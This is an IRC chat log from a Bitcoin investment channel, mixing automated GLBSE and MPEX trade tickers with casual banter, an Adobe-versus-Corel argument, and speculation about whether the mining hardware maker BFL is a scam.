17:01:31 fuck yeah Sep 20 17:01:32 its cold here Sep 20 17:01:37 my fingers are not working Sep 20 17:01:44 also brains. Sep 20 17:01:44 and thin or tin ? :) Sep 20 17:01:48 lol Sep 20 17:01:51 thin tin foil hat Sep 20 17:01:54 where are you that its cold? Sep 20 17:02:14 in the dark and feed shit, like mushroom Sep 20 17:02:22 i see Sep 20 17:02:48 slovenia if you must know Sep 20 17:03:01 its 16°C in my room now Sep 20 17:03:11 i woke up today and saw i was a XKCD Comic crazy stuff Sep 20 17:03:13 yes sun is shining Sep 20 17:03:16 yet Sep 20 17:03:18 i want to go to slovenia Sep 20 17:03:23 Chaaang-Noi, come Sep 20 17:03:27 that whole area has hot girls... Sep 20 17:03:32 [GLBSE] [OBSI.HRPT] 3 @ 0.09910002 = 0.2973 BTC [-] Sep 20 17:03:34 [GLBSE] [OBSI.HRPT] 27 @ 0.0991 = 2.6757 BTC [-] Sep 20 17:03:37 im not sure my wife would let me Sep 20 17:03:47 lol Sep 20 17:03:55 she was never taught the share her toys when she was a child Sep 20 17:04:02 [MPEX] [S.MPOE] 16702 @ 0.000415 = 6.9313 BTC [+] Sep 20 17:04:04 [MPEX] [S.MPOE] 30915 @ 0.00041539 = 12.8418 BTC [+] Sep 20 17:04:11 to* Sep 20 17:04:26 um werent you saying not long ago she doesnt mind if you hook up with others Sep 20 17:04:40 kakobrekla: you think Ven is scamconomy? then WTF has bitcoin turned into? Sep 20 17:04:51 scams scams everywhere! Sep 20 17:04:58 hey i didnt say we are angels here Sep 20 17:05:04 but we dont need more of spam Sep 20 17:05:06 em scam. Sep 20 17:05:08 but that is plagueing the bitconomy Sep 20 17:05:23 I try to add real services and goods and links to the real economy Sep 20 17:05:34 it's not a scam if you can actually buy real things Sep 20 17:05:38 which you can Sep 20 17:05:42 yeah kakobrekla she is fine with that as long as i dont spend money to do so Sep 20 17:05:51 [GLBSE] [FUTUREFUND] 550 @ 0.00012936 = 0.0711 BTC [+] Sep 20 17:06:00 Chaaang-Noi, you give me money and ill pay for it Sep 20 17:06:04 going to visit you would put a slight dint into the budget and she would notice:) Sep 20 17:06:08 lol Sep 20 17:06:15 i like your thinking :) Sep 20 17:06:19 ;> Sep 20 17:06:31 im off to a few days in cambodia tomorrow Sep 20 17:06:50 im off right now Sep 20 17:06:51 bbl Sep 20 17:06:55 girls not as hot as yours im sure but a lot closer Sep 20 17:06:58 peace Sep 20 17:07:00 cya Sep 20 17:08:13 [GLBSE] [OBSI.HRPT] 50 @ 0.0991 = 4.955 BTC [-] Sep 20 17:10:22 [GLBSE] [OBSI.HRPT] 50 @ 0.099 = 4.95 BTC [-] Sep 20 17:10:23 [GLBSE] [OBSI.HRPT] 50 @ 0.0991 = 4.955 BTC [+] Sep 20 17:10:24 [GLBSE] [OBSI.HRPT] 50 @ 0.0992 = 4.96 BTC [+] Sep 20 17:10:25 [GLBSE] [OBSI.HRPT] 50 @ 0.0993 = 4.965 BTC [+] Sep 20 17:10:26 [GLBSE] [OBSI.HRPT] 50 @ 0.0994 = 4.97 BTC [+] Sep 20 17:10:27 [GLBSE] [OBSI.HRPT] 50 @ 0.0995 = 4.975 BTC [+] Sep 20 17:10:29 [GLBSE] [OBSI.HRPT] 50 @ 0.0996 = 4.98 BTC [+] Sep 20 17:10:30 [GLBSE] [OBSI.HRPT] 50 @ 0.0997 = 4.985 BTC [+] Sep 20 17:10:31 [GLBSE] [OBSI.HRPT] 50 @ 0.0998 = 4.99 BTC [+] Sep 20 17:15:18 [GLBSE] [GSDPT] 89 @ 0.003389 = 0.3016 BTC [-] Sep 20 17:15:34 [GLBSE] [OBSI.HRPT] 2 @ 0.0999 = 0.1998 BTC [+] Sep 20 17:16:53 [MPEX] [F.GIGA.ETF] 15000 @ 0.00027639 = 4.1459 BTC [+] Sep 20 17:16:54 [MPEX] [F.GIGA.ETF] 5247 @ 0.00029381 = 1.5416 BTC [+] Sep 20 17:16:55 [MPEX] [F.GIGA.ETF] 5700 @ 0.00031408 = 1.7903 BTC [+] Sep 20 17:16:56 [MPEX] [F.GIGA.ETF] 10053 @ 0.00035629 = 3.5818 BTC [+] Sep 20 17:17:24 [GLBSE] [BAKEWELL] 5 @ 0.1499999 = 0.75 BTC [-] Sep 20 17:17:25 [GLBSE] [BAKEWELL] 11 @ 0.15 = 1.65 BTC [+] Sep 20 17:19:00 [GLBSE] [OBSI.HRPT] 6 @ 0.099 = 0.594 BTC [-] Sep 20 17:19:14 [GLBSE] [GSDPT] 211 @ 0.003365 = 0.71 BTC [-] Sep 20 17:21:13 [GLBSE] [OBSI.HRPT] 5 @ 0.099 = 0.495 BTC [-] Sep 20 17:23:14 [GLBSE] [PUREMINING] 11 @ 0.0969 = 1.0659 BTC [+] Sep 20 17:38:30 [GLBSE] [OBSI.HRPT] 1 @ 0.099 BTC [-] Sep 20 17:43:01 [MPEX] [S.MPOE] 5000 @ 0.00041515 = 2.0758 BTC [-] Sep 20 17:53:32 how do you register a chan? iv done it before but i forgot... Sep 20 17:57:32 -ChanServ- #ppcoin-otc is now registered to Chaang-Noi. Sep 20 17:57:34 thanks guys Sep 20 17:57:44 [GLBSE:OBSI.HRPT] [Bid: 0.09809999] [Ask: 0.0981] [Spread: 0.00000001] [Last: 0.099] [24hVol: 303.4537741] [7dAvg: 0.1003381] Sep 20 18:12:37 [GLBSE] [OBSI.HRPT] 10 @ 0.09809999 = 0.981 BTC [-] Sep 20 18:14:01 [MPEX] [S.MPOE] 5286 @ 0.00041539 = 2.1958 BTC [+] Sep 20 18:14:03 [MPEX] [S.MPOE] 31304 @ 0.00041567 = 13.0121 BTC [+] Sep 20 18:14:04 [MPEX] [S.MPOE] 11485 @ 0.00041577 = 4.7751 BTC [+] Sep 20 18:14:05 [MPEX] [S.MPOE] 225 @ 0.00041578 = 0.0936 BTC [+] Sep 20 18:15:06 [GLBSE] [GIGAMINING] 2 @ 0.64120002 = 1.2824 BTC [-] Sep 20 18:15:25 [GLBSE] [GIGAMINING] 5 @ 0.64120002 = 3.206 BTC [-] Sep 20 18:15:58 [GLBSE] [GIGAMINING] 3 @ 0.64120002 = 1.9236 BTC [-] Sep 20 18:17:34 [GLBSE] [SYNERGY] 2 @ 0.161999 = 0.324 BTC [-] Sep 20 18:17:43 [GLBSE] [GIGAMINING] 7 @ 0.68989999 = 4.8293 BTC [+] Sep 20 18:17:44 [GLBSE] [GIGAMINING] 7 @ 0.6899 = 4.8293 BTC [+] Sep 20 18:17:50 [GLBSE] [GIGAMINING] 6 @ 0.6411 = 3.8466 BTC [-] Sep 20 18:18:20 If only the buyer and the seller weren't so impatient they might save 5% Sep 20 18:21:12 whats up? Sep 20 18:22:06 [GLBSE] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Sep 20 18:22:25 issue as in problem or issue as in new asset? Sep 20 18:24:46 what is it? Sep 20 18:25:07 synthetic short of fixed MH miners? Sep 20 18:40:01 [MPEX] [F.GIGA.ETF] 11200 @ 0.00031083 = 3.4813 BTC [-] Sep 20 18:40:02 [MPEX] [S.MPOE] 16600 @ 0.00041515 = 6.8915 BTC [-] Sep 20 18:42:50 [GLBSE] [ASICMINER] 6 @ 0.124865 = 0.7492 BTC [-] Sep 20 18:42:51 [GLBSE] [ASICMINER] 5 @ 0.124875 = 0.6244 BTC [+] Sep 20 18:43:47 [GLBSE] [ASICMINER] 21 @ 0.12899 = 2.7088 BTC [+] Sep 20 18:53:10 [GLBSE] [GIGAMINING] 3 @ 0.685 = 2.055 BTC [+] Sep 20 18:53:12 [GLBSE] [GIGAMINING] 43 @ 0.6899 = 29.6657 BTC [+] Sep 20 18:53:13 [GLBSE] [GIGAMINING] 54 @ 0.697 = 37.638 BTC [+] Sep 20 18:55:39 [GLBSE] [KRAKEN] 1 @ 0.00999996 BTC [+] Sep 20 18:57:12 [GLBSE] [ASICMINER] 4 @ 0.121001 = 0.484 BTC [-] Sep 20 18:57:14 [GLBSE] [ASICMINER] 5 @ 0.121 = 0.605 BTC [-] Sep 20 18:57:15 [GLBSE] [ASICMINER] 32 @ 0.120001 = 3.84 BTC [-] Sep 20 18:57:16 [GLBSE] [ASICMINER] 9 @ 0.12 = 1.08 BTC [-] Sep 20 18:57:18 [GLBSE] [ASICMINER] 44 @ 0.12 = 5.28 BTC [-] Sep 20 18:57:19 [GLBSE] [ASICMINER] 12 @ 0.11820098 = 1.4184 BTC [-] Sep 20 18:58:10 [GLBSE] [OBSI.HRPT] 18 @ 0.0981 = 1.7658 BTC [+] Sep 20 19:03:50 [GLBSE] [GSDPT] 5 @ 0.0034 = 0.017 BTC [+] Sep 20 19:07:01 [MPEX] [S.MPOE] 5475 @ 0.00041578 = 2.2764 BTC [+] Sep 20 19:07:02 [MPEX] [S.MPOE] 12500 @ 0.00041591 = 5.1989 BTC [+] Sep 20 19:10:35 [GLBSE] [OBSI.HRPT] 20 @ 0.0981 = 1.962 BTC [+] Sep 20 19:15:51 [GLBSE] [FPGAMINING] 2 @ 0.638 = 1.276 BTC [+] Sep 20 19:15:53 [GLBSE] [FPGAMINING] 1 @ 0.6389 BTC [+] Sep 20 19:15:53 [GLBSE] [FPGAMINING] 1 @ 0.63894999 BTC [+] Sep 20 19:15:54 [GLBSE] [FPGAMINING] 1 @ 0.63895 BTC [+] Sep 20 19:15:56 [GLBSE] [FPGAMINING] 4 @ 0.638995 = 2.556 BTC [+] Sep 20 19:15:57 [GLBSE] [FPGAMINING] 9 @ 0.639 = 5.751 BTC [+] Sep 20 19:15:58 [GLBSE] [FPGAMINING] 12 @ 0.64 = 7.68 BTC [+] Sep 20 19:16:49 [GLBSE] [BTC-MINING] 1 @ 0.9798 BTC [+] Sep 20 19:19:03 [GLBSE] [BITBOND] 9 @ 0.369 = 3.321 BTC [+] Sep 20 19:19:04 [GLBSE] [BITBOND] 19 @ 0.37 = 7.03 BTC [+] Sep 20 19:25:18 [GLBSE] [OBSI.HRPT] 6 @ 0.0981 = 0.5886 BTC [+] Sep 20 19:28:48 [GLBSE] [OBSI.HRPT] 6 @ 0.0981 = 0.5886 BTC [+] Sep 20 19:28:50 [GLBSE] [OBSI.HRPT] 48 @ 0.0982 = 4.7136 BTC [+] Sep 20 19:30:28 [MPEX] [O.BTCUSD.P200T] 1 @ 0.7352903 BTC [-] Sep 20 19:31:18 [GLBSE] [ABM] 1 @ 0.15 BTC [-] Sep 20 19:53:34 [GLBSE] [MMM] 1 @ 0.79 BTC [+] Sep 20 20:01:01 [MPEX] [F.GIGA.ETF] 300 @ 0.00031083 = 0.0932 BTC [-] Sep 20 20:13:47 [GLBSE] [TYGRR.BOND-P] 4 @ 0.066 = 0.264 BTC [+] Sep 20 20:22:30 [GLBSE] [PUREMINING] 84 @ 0.0969 = 8.1396 BTC [+] Sep 20 20:23:44 [GLBSE] [PUREMINING] 31 @ 0.097 = 3.007 BTC [+] Sep 20 20:24:55 [GLBSE] [PUREMINING] 6 @ 0.0994 = 0.5964 BTC [+] Sep 20 20:26:49 [MPEX] [F.GIGA.ETF] 6700 @ 0.0002976 = 1.9939 BTC [-] Sep 20 20:36:28 [GLBSE] [OBSI.HRPT] 1 @ 0.0982 BTC [+] Sep 20 20:52:00 [MPEX] [S.MPOE] 25800 @ 0.00041531 = 10.715 BTC [-] Sep 20 20:53:21 [GLBSE] [KRAKEN] 6 @ 0.00999996 = 0.06 BTC [+] Sep 20 21:00:41 [GLBSE] [BMF] 10 @ 0.7398 = 7.398 BTC [+] Sep 20 21:01:02 [GLBSE] [GIGAMINING] 2 @ 0.6759 = 1.3518 BTC [-] Sep 20 21:01:34 [GLBSE] [RSM] 1 @ 0.29999999 BTC [+] Sep 20 21:02:19 [GLBSE] [RSM] 3 @ 0.3 = 0.9 BTC [+] Sep 20 21:03:08 [GLBSE] [OBSI.HRPT] 5 @ 0.0981 = 0.4905 BTC [-] Sep 20 21:04:16 [GLBSE] [GIGAMINING] 4 @ 0.6759 = 2.7036 BTC [-] Sep 20 21:16:53 [GLBSE] [ASICMINER] 4 @ 0.1264989 = 0.506 BTC [+] Sep 20 21:17:59 [GLBSE] [ASICMINER] 32 @ 0.126499 = 4.048 BTC [+] Sep 20 21:18:51 [GLBSE] [ASICMINER] 44 @ 0.1265 = 5.566 BTC [+] Sep 20 21:18:52 [GLBSE] [ASICMINER] 100 @ 0.1268 = 12.68 BTC [+] Sep 20 21:18:54 [GLBSE] [ASICMINER] 100 @ 0.128 = 12.8 BTC [+] Sep 20 21:18:55 [GLBSE] [ASICMINER] 256 @ 0.12899 = 33.0214 BTC [+] Sep 20 21:19:33 [GLBSE] [OBSI.HRPT] 10 @ 0.0981 = 0.981 BTC [-] Sep 20 21:20:20 [GLBSE] [BFLS] 1 @ 0.879 BTC [+] Sep 20 21:20:38 [GLBSE] [ASICMINER] 223 @ 0.12899 = 28.7648 BTC [+] Sep 20 21:22:12 [GLBSE] [ASICMINER] 16 @ 0.129 = 2.064 BTC [+] Sep 20 21:23:26 [MPEX] [S.MPOE] 24500 @ 0.00041515 = 10.1712 BTC [-] Sep 20 21:23:28 [MPEX] [S.MPOE] 8398 @ 0.00041292 = 3.4677 BTC [-] Sep 20 21:23:30 [MPEX] [S.MPOE] 302 @ 0.00041263 = 0.1246 BTC [-] Sep 20 21:24:23 [GLBSE] [JAH] 25 @ 0.135 = 3.375 BTC [+] Sep 20 21:24:24 [GLBSE] [JAH] 25 @ 0.1375 = 3.4375 BTC [+] Sep 20 21:24:25 [GLBSE] [JAH] 19 @ 0.139 = 2.641 BTC [+] Sep 20 21:24:27 [GLBSE] [JAH] 2 @ 0.1399 = 0.2798 BTC [+] Sep 20 21:24:28 [GLBSE] [JAH] 28 @ 0.165 = 4.62 BTC [+] Sep 20 21:24:31 [GLBSE] [GIGAMINING] 11 @ 0.676 = 7.436 BTC [+] Sep 20 21:25:33 [GLBSE] [GIGAMINING] 50 @ 0.677 = 33.85 BTC [+] Sep 20 21:26:21 [GLBSE] [GIGAMINING] 17 @ 0.697 = 11.849 BTC [+] Sep 20 21:30:02 [GLBSE] [JAH] 2 @ 0.165 = 0.33 BTC [+] Sep 20 21:36:15 [MPEX] [B.MPCD.B] 80000 @ 0.00100916 = 80.7328 BTC [-] Sep 20 21:41:59 [GLBSE] [OBSI.HRPT] 1 @ 0.0981 BTC [-] Sep 20 21:44:26 [GLBSE] [OBSI.HRPT] 5 @ 0.0981 = 0.4905 BTC [-] Sep 20 21:50:14 [GLBSE] [NYAN.C] 1 @ 0.35 BTC [+] Sep 20 21:54:01 [MPEX] [F.GIGA.ETF] 2700 @ 0.00028363 = 0.7658 BTC [-] Sep 20 21:54:02 [MPEX] [F.GIGA.ETF] 4300 @ 0.00030056 = 1.2924 BTC [+] Sep 20 21:57:30 [GLBSE] [BIB.PIRATE] 100 @ 0.05 = 5 BTC [-] Sep 20 21:57:32 [GLBSE] [BIB.PIRATE] 150 @ 0.04500001 = 6.75 BTC [-] Sep 20 21:57:32 [GLBSE] [BIB.PIRATE] 45 @ 0.045 = 2.025 BTC [-] Sep 20 21:57:33 [GLBSE] [BIB.PIRATE] 5 @ 0.035 = 0.175 BTC [-] Sep 20 21:59:27 [GLBSE] [BIB.BVPS] 1 @ 0.00210001 BTC [-] Sep 20 21:59:29 [GLBSE] [BIB.BVPS] 100 @ 0.0021 = 0.21 BTC [-] Sep 20 21:59:30 [GLBSE] [BIB.BVPS] 1899 @ 0.0016 = 3.0384 BTC [-] Sep 20 22:01:01 [MPEX] [S.BVPS] 600 @ 0.0032074 = 1.9244 BTC [+] Sep 20 22:01:02 [MPEX] [S.BVPS] 300 @ 0.00319567 = 0.9587 BTC [-] Sep 20 22:01:04 [MPEX] [S.BVPS] 250 @ 0.00297518 = 0.7438 BTC [-] Sep 20 22:01:05 [MPEX] [S.BVPS] 250 @ 0.00293989 = 0.735 BTC [-] Sep 20 22:01:06 [MPEX] [S.BVPS] 138 @ 0.00292608 = 0.4038 BTC [-] Sep 20 22:01:07 [MPEX] [S.BVPS] 62 @ 0.001175 = 0.0729 BTC [-] Sep 20 22:01:29 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.885 = 1.77 BTC [+] Sep 20 22:01:31 [GLBSE] [BIF.1YR.LOAN] 4 @ 0.919 = 3.676 BTC [+] Sep 20 22:01:33 [GLBSE] [BIF.1YR.LOAN] 4 @ 0.9234576 = 3.6938 BTC [+] Sep 20 22:04:09 [GLBSE] [BIF.1YR.LOAN] 10 @ 0.9234576 = 9.2346 BTC [+] Sep 20 22:05:31 [GLBSE] [LTC-MINING] 1 @ 0.59 BTC [-] Sep 20 22:13:34 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 20 22:21:55 Chaang-Noi: you gonna tell me why you're disappointed in me? Sep 20 22:22:09 copumpkin: I'm disappointed in you too Sep 20 22:22:18 Azelphur: are you disappointED or disappoint? Sep 20 22:22:28 both, at the same time :o Sep 20 22:22:34 shit, that's bad Sep 20 22:22:39 indeed Sep 20 22:22:45 I can only deal with one form of disappoint at a time Sep 20 22:22:58 alright, I'm gonna drop off the internet Sep 20 22:23:02 xD Sep 20 22:23:10 what did he do ? Sep 20 22:23:42 no idea I was just jumping on the bandwagon Sep 20 22:24:00 Chaang-Noi said i was an "opportunistic troll" Sep 20 22:24:10 Chaang-Noi should know. Sep 20 22:24:18 that's an astute observation Sep 20 22:24:23 if I'm being hinest Sep 20 22:24:31 or honest, even Sep 20 22:26:22 aaa google groups Sep 20 22:26:28 too much hassle Sep 20 22:26:47 [GLBSE] [NASTY] 2 @ 0.51 = 1.02 BTC [-] Sep 20 22:28:01 [MPEX] [S.MPOE] 18700 @ 0.00041531 = 7.7663 BTC [+] Sep 20 22:28:07 [GLBSE] [OBSI.HRPT] 11 @ 0.0981 = 1.0791 BTC [-] Sep 20 22:28:33 [GLBSE] [PUREASIC] 2 @ 0.8 = 1.6 BTC [+] Sep 20 22:29:42 <__Atlas__> I don't know how anyone speculates on GIGAMINING Sep 20 22:29:48 <__Atlas__> It's a nightmare of a security Sep 20 22:30:45 yeah Sep 20 22:30:51 would be much easier to speculat on Sep 20 22:30:54 pirate Sep 20 22:31:11 definitely it is Sep 20 22:31:22 ok I'm off to burger king Sep 20 22:31:29 <__Atlas__> Enjoy. Sep 20 22:31:40 those arteries won't clog themselves Sep 20 22:31:46 later ladies Sep 20 22:36:43 bugger king ?! Sep 20 22:37:31 [GLBSE] [GIGAMINING] 14 @ 0.69 = 9.66 BTC [-] Sep 20 22:37:55 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 20 22:38:12 GIGAMINING [1@0.88BTC] paid: 0.45625096 BTC. Last price: 0.69 BTC. Capital gain: -0.19 BTC. Total: 0.26625096 BTC. (30.3%) Sep 20 22:38:57 heh Sep 20 22:39:04 I'm a corel fangirl Sep 20 22:39:13 especially after the acquired JASC paint shop Sep 20 22:39:30 have fun with that though Sep 20 22:39:32 I guess Sep 20 22:39:48 it's not adobe? lol Sep 20 22:40:04 "integration" ? Sep 20 22:40:24 uhm Sep 20 22:40:52 I've had zero problems moving data between various graphic applications (pastebuffer, import / export or otherwise) Sep 20 22:41:05 what? Sep 20 22:41:15 "half of the other stuff you need is adobe" Sep 20 22:41:28 I need exactly zero adobe in my life (beyond adobe flash player) Sep 20 22:41:54 uh Sep 20 22:42:14 corel draw and PSP have compatible raster formats Sep 20 22:42:22 i don't use flash player Sep 20 22:42:33 mircea_popescu: no youtube then? Sep 20 22:42:35 specifically because adobe sucks worse than apple even. Sep 20 22:42:38 html5 Sep 20 22:42:42 oooh Sep 20 22:42:46 good point Sep 20 22:42:56 uhm Sep 20 22:42:58 doesn't work everywhere, but hey, good for productivity. Sep 20 22:43:44 well I use crunchyroll, hulu, various streaming thingies (including a program or two on MSNBC like rachel maddow) so I need it for more than just youtube Sep 20 22:44:05 lol Sep 20 22:44:20 yeaaaah uhm Sep 20 22:44:24 http://www.betsofbitco.in/item?id=566 apparently 12:1 odds by now. Sep 20 22:44:27 adobe is crap Sep 20 22:44:30 that's why I use corel :P Sep 20 22:44:32 trololol Sep 20 22:44:51 yeah maybe Sep 20 22:45:01 dvorak versus qwerty Sep 20 22:45:14 I'm faster with qwerty (80 WPM) Sep 20 22:45:33 k Sep 20 22:46:07 the SSD on my laptop is only 256 gig so I prefer not to have too much crap installed Sep 20 22:46:10 eww Sep 20 22:46:17 adobe audition was completely unusable for me Sep 20 22:46:42 too much bloat / UGLY user interface of confusing confusion Sep 20 22:47:00 similar to my issue(s) with most adobe products Sep 20 22:47:14 eh Sep 20 22:47:30 I just don't feel like burning any points on the adobe learning curve Sep 20 22:47:38 would take years to be as productive as I am with corel Sep 20 22:47:51 ? Sep 20 22:47:56 what about 10 years ago? Sep 20 22:48:11 heh Sep 20 22:48:17 I still have a cool edit pro license Sep 20 22:48:30 adobe audition doesn't have any new features I find useful Sep 20 22:48:47 despite that, I actually have an adobe audition licen... Sep 20 22:48:51 what's "integrated"? Sep 20 22:49:20 I simply don't use adobe audition because I find cool edit more useful Sep 20 22:49:41 lol Sep 20 22:49:42 so? Sep 20 22:49:53 says you Sep 20 22:50:03 my window manager I can operate multiple apps pretty bloody fast Sep 20 22:50:22 lol Sep 20 22:50:33 should be saving progress / snapshots while working anyway Sep 20 22:50:48 oh, right Sep 20 22:51:04 let's here it Sep 20 22:51:15 *hear Sep 20 22:51:41 err Sep 20 22:51:57 "really hard" for me, would be learning adobe toolchain(s) Sep 20 22:52:11 I'm fine with my existing tools (more of which are opensource than corel) Sep 20 22:52:14 no they're not Sep 20 22:52:19 adobe is NOT #1 Sep 20 22:53:28 [MPEX] [S.MPOE] 1600 @ 0.00041531 = 0.6645 BTC [+] Sep 20 22:53:30 [MPEX] [S.MPOE] 24754 @ 0.0004154 = 10.2828 BTC [+] Sep 20 22:53:30 [MPEX] [S.MPOE] 19321 @ 0.00041591 = 8.0358 BTC [+] Sep 20 22:53:36 http://www.steves-digicams.com/knowledge-center/how-tos/video-software/video-editing-tools-the-3-best-programs.html#b Sep 20 22:53:41 adobe is 3rd Sep 20 22:53:42 not 1st Sep 20 22:54:04 I could find other people ranking adobe as not first Sep 20 22:54:11 but not worth it Sep 20 22:54:16 I have what I like Sep 20 22:54:22 and you're free to use adobe if it makes you happy Sep 20 22:55:20 installing this creative suite thingy Sep 20 22:55:26 what is hard disk footprint for the whole thing? Sep 20 22:55:56 you're sounding more like an apple user every second Sep 20 23:11:30 nah Sep 20 23:11:33 that article is all wrong Sep 20 23:11:34 http://pastebin.com/raw.php?i=UgzEKjF9 Sep 20 23:11:41 this is correct. Sep 20 23:18:06 [GLBSE] [FPGAMINING] 3 @ 0.565001 = 1.695 BTC [-] Sep 20 23:18:08 [GLBSE] [FPGAMINING] 2 @ 0.56500001 = 1.13 BTC [-] Sep 20 23:18:09 [GLBSE] [FPGAMINING] 3 @ 0.565 = 1.695 BTC [-] Sep 20 23:18:10 [GLBSE] [FPGAMINING] 4 @ 0.56 = 2.24 BTC [-] Sep 20 23:18:11 [GLBSE] [FPGAMINING] 10 @ 0.5531 = 5.531 BTC [-] Sep 20 23:18:12 [GLBSE] [FPGAMINING] 5 @ 0.553 = 2.765 BTC [-] Sep 20 23:18:13 [GLBSE] [FPGAMINING] 2 @ 0.552 = 1.104 BTC [-] Sep 20 23:18:14 [GLBSE] [FPGAMINING] 19 @ 0.551 = 10.469 BTC [-] Sep 20 23:18:16 [GLBSE] [FPGAMINING] 6 @ 0.5 = 3 BTC [-] Sep 20 23:20:01 [MPEX] [F.GIGA.ETF] 494 @ 0.00026135 = 0.1291 BTC [-] Sep 20 23:20:02 [MPEX] [F.GIGA.ETF] 15006 @ 0.00026132 = 3.9214 BTC [-] Sep 20 23:20:04 [MPEX] [S.MPOE] 31979 @ 0.00041591 = 13.3004 BTC [+] Sep 20 23:20:05 [MPEX] [S.MPOE] 5821 @ 0.00041591 = 2.421 BTC [+] Sep 20 23:22:01 [MPEX] [S.DICE] 11600 @ 0.0034 = 39.44 BTC [+] Sep 20 23:23:24 [GLBSE] [GIGAMINING] 36 @ 0.69 = 24.84 BTC [-] Sep 20 23:37:07 just in Sep 20 23:37:08 https://bitcointalk.org/index.php?topic=110868.0 Sep 20 23:38:59 whoop whoop Sep 20 23:40:16 [GLBSE] [OBSI.HRPT] 2 @ 0.0981 = 0.1962 BTC [-] Sep 20 23:41:23 wow hot wife Sep 20 23:44:52 well Sep 20 23:45:00 its about time bfl gets its own subforum or smth Sep 20 23:45:02 aha Sep 20 23:45:57 Indeed Sep 20 23:46:00 I recommend wife for one of mp's forums Sep 20 23:46:55 so is sonny explaining his conviction in terms of sticking it to the man ? Sep 20 23:47:26 not really Sep 20 23:47:41 more like giving up in the face of crushing jail time Sep 20 23:48:08 He should have thrown in a Ron Paul shoutout though Sep 20 23:48:15 [MPEX] [F.GIGA.ETF] 1020 @ 0.00026132 = 0.2665 BTC [-] Sep 20 23:48:16 [MPEX] [F.GIGA.ETF] 10379 @ 0.00026083 = 2.7072 BTC [-] Sep 20 23:48:18 [MPEX] [F.GIGA.ETF] 1488 @ 0.00025976 = 0.3865 BTC [-] Sep 20 23:48:19 seems weaksauce. Sep 20 23:48:34 Whatcha gonna do? Sep 20 23:48:36 i still don't see the connection between fraud and gambling. Sep 20 23:49:09 i mean sure, the us govt is a piece of shit, always trying to fuck over independent folks Sep 20 23:49:19 this does not mean every petty criminal is a prisoner in the basille. Sep 20 23:49:29 bastille* Sep 20 23:49:30 His father used his company's gambling license to run his mail fraud which was related to gambling. Sep 20 23:49:35 right. Sep 20 23:49:40 Or so he claim... Sep 20 23:49:43 aka my cat did it defense. Sep 20 23:49:46 It's not clear if the clients were defrauded Sep 20 23:49:59 or just the US gov of taxes Sep 20 23:50:17 I don't really care. They either ship or they don't ship. Sep 20 23:50:30 So far they have shipped their previous products. Sep 20 23:50:55 Its also about how, what and when. Sep 20 23:50:59 The case went all the way to the Italian Supreme Court. Sep 20 23:51:04 a case number would have helped. Sep 20 23:51:25 Bugpowder if you read up, they were at least once proven to have lied about the specs/content Sep 20 23:51:34 they also shipped like 6 months late etc. Sep 20 23:53:13 so anyway, i'm "looking it up" : http://www.ussc.gov/Guidelines/2011_guidelines/Manual_HTML/index.cfm Sep 20 23:53:23 i fail to see how first time offense goes to life w/o parole. Sep 20 23:53:42 [GLBSE] [TYGRR.BOND-D] 1 @ 1.01 BTC [+] Sep 20 23:57:34 $10MM+ seems plausible Sep 20 23:58:14 Glad others will do the heavy lifting on the story checking Sep 20 23:58:16 [GLBSE] [OBSI.HRPT] 12 @ 0.09809999 = 1.1772 BTC [-] Sep 20 23:58:58 [GLBSE] [TYGRR.BOT] 1 @ 0.91 BTC [-] Sep 21 00:00:03 [GLBSE] [GIGAMINING] 2 @ 0.69 = 1.38 BTC [-] Sep 21 00:00:25 [MPEX] [O.BTCUSD.P150T] 1 @ 0.2660675 BTC [-] Sep 21 00:03:35 [GLBSE] [ASICMINER] 4 @ 0.12125 = 0.485 BTC [-] Sep 21 00:06:22 [GLBSE] [TYGRR.BOND-A] 6 @ 0.114 = 0.684 BTC [-] Sep 21 00:06:43 [GLBSE] [ASICMINER] 20 @ 0.12000431 = 2.4001 BTC [-] Sep 21 00:07:19 [GLBSE] [ASICMINER] 30 @ 0.1200043 = 3.6001 BTC [-] Sep 21 00:09:28 Arf, I seem to be having problems with my connection. Somehow for every page load, my connection needs five seconds to start. Only then does it start loading the page. Sep 21 00:09:42 According to my network monitor anyway and page load time Sep 21 00:09:53 Maybe my wireless card is dying Sep 21 00:10:58 [GLBSE] [ASICMINER] 46 @ 0.12 = 5.52 BTC [-] Sep 21 00:12:39 maybe dns Sep 21 00:14:10 eh, no idea Sep 21 00:14:20 But doesn't seem to want to be solved Sep 21 00:18:23 https://bitcointalk.org/index.php?topic=97269.msg1207063#msg1207063 Sep 21 00:18:42 well, that escalated quickly Sep 21 00:21:27 that needs larger fonts Sep 21 00:23:44 heh Sep 21 00:26:00 [MPEX] [S.MPOE] 23500 @ 0.00041263 = 9.6968 BTC [-] Sep 21 00:29:38 There's a thread where BFL admits? Don't remember which Sep 21 00:29:52 That the person is part of the company Sep 21 00:31:59 Except people will return all FPGAs + extra money for the ASIC upgrades... Sep 21 00:34:07 [GLBSE] [NASTY] 1 @ 0.51 BTC [-] Sep 21 00:34:10 He gets paid the FPGA price twice Sep 21 00:34:19 Assuming there's a profit margin on it. Sep 21 00:34:23 Already. Sep 21 00:34:58 And you only get half off on trade ins so need to pay the FPGA price in full again to get your ASIC... Sep 21 00:35:54 Probably, but remember that you might not get as many initial orders without proving yourself first. Sep 21 00:38:50 It would actually be more lucrative to do it that way. Suppose you need 50$ to produce something, sell it 100$. You can run away with 100$ and not produce anything. Or offer an upgrade, get back the 50$ product, mine bitcoins with it. Keep the 50$ and ask for 100$ for an upgrade which doesn't exists. You now have a free FPGA mining farm +150$ + extra ASIC orders Sep 21 00:39:38 Scammers are not all take money and run away on first try... Sep 21 00:41:43 BTC-Mining sounds about right. Sep 21 00:42:44 SCAMIOUS! Sep 21 00:42:51 jk Sep 21 00:43:23 ah sorry. Sep 21 00:44:15 [GLBSE] [FDBF] 2 @ 0.15 = 0.3 BTC [+] Sep 21 00:45:30 they are semi scam because of their politics Sep 21 00:46:07 their 'rules' of the game Sep 21 00:46:30 same thing you are Sep 21 00:47:04 they run their biz like shit Sep 21 00:47:09 breaking promisses etc Sep 21 00:47:11 that politics Sep 21 00:47:16 that rules of the game Sep 21 00:47:21 and they fuckin sucks at it Sep 21 00:47:27 -s Sep 21 00:50:09 [GLBSE] [LTC-MINING] 2 @ 0.55 = 1.1 BTC [-] Sep 21 00:51:10 [GLBSE] [NYAN.B] 1 @ 1.02 BTC [+] Sep 21 00:53:00 [MPEX] [S.MPOE] 